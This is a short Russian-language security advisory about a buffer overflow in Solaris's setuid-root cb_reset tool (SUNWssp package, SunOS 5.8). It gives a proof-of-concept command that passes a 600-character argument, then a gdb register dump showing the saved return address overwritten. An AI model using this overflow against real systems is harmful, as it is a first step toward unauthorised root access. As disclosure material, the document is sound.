уязвимость в Solaris /opt/SUNWssp/bin/cb_reset

Найдена проблема с корневой командой cb_reset setuid, которая включена в пакет SUNWSSP ( по умолчанию не устанавливается). Из-за неправильной обработке входного параметра, при запросе более 600 символов происходит переполнение буфера, что делает возможность записи поверх потенциально опасного кода.

Уязвимость работает в версии SunOS 5.8, на других не тестировалась.



Эксплоит:

$ uname -a

SunOS laika 5.8 Generic_108528-07 sun4u sparc SUNW,Ultra-5_10



$ ls /tftpboot/cb_port

/tftpboot/cb_port



$ /opt/SUNWssp/bin/cb_reset `perl -e 'print "A"x600'`

Resetting host AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...

ether_hostton(SrcHost:laika): No such file or directory ether_hostton(DstHost:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAA): No such file or directory

Bus Error (core dumped)



$ gdb /opt/SUNWssp/bin/cb_reset --core=core

Copyright 2000 Free Software Foundation, Inc.

GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "sparc-sun-solaris2.8"... (no debugging symbols found)... Core was generated by `/opt/SUNWssp/bin/cb_reset AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'.

Program terminated with signal 10, Bus Error.

Reading symbols from /opt/SUNWssp/lib/libSspFileAccess.so...

(no debugging symbols found)...done.

Loaded symbols for /opt/SUNWssp/lib/libSspFileAccess.so

Reading symbols from /opt/SUNWssp/lib/liblogger.so...

(no debugging symbols found)...done.



[...]



Loaded symbols for /usr/lib/nss_files.so.1

#0 0x1219c in cb_send_frame ()

(gdb) info registers

g0 0x0 0

g1 0xff195b80 -15115392

g2 0xff322630 -13490640

g3 0xff332d78 -13423240

g4 0x0 0

g5 0x0 0

g6 0x0 0

g7 0x0 0

o0 0x13278 78456

o1 0xff1bbab8 -14959944

o2 0xff1b8018 -14974952

o3 0x13278 78456

o4 0x13258 78424

o5 0xffbedb71 -4269199

sp 0xffbedb18 -4269288

o7 0x1218c 74124

l0 0xc3c3c3c3 -1010580541

l1 0x41414141 1094795585

l2 0x41414141 1094795585

l3 0x41414141 1094795585

l4 0x41414141 1094795585

l5 0x41414141 1094795585

l6 0x41414141 1094795585

l7 0x41414141 1094795585

i0 0x41414141 1094795585

i1 0x41414141 1094795585

i2 0x41414141 1094795585

i3 0x41414141 1094795585

i4 0x4141414d 1094795597

i5 0x41414141 1094795585

fp 0x41414141 1094795585

i7 0x41414141 1094795585 (***)

y 0xb 11

psr 0xfe801001 -25161727

wim 0x0 0

tbr 0x0 0

pc 0x1219c 74140

npc 0x121a0 74144

fpsr 0x0 0

cpsr 0x0 0

(gdb)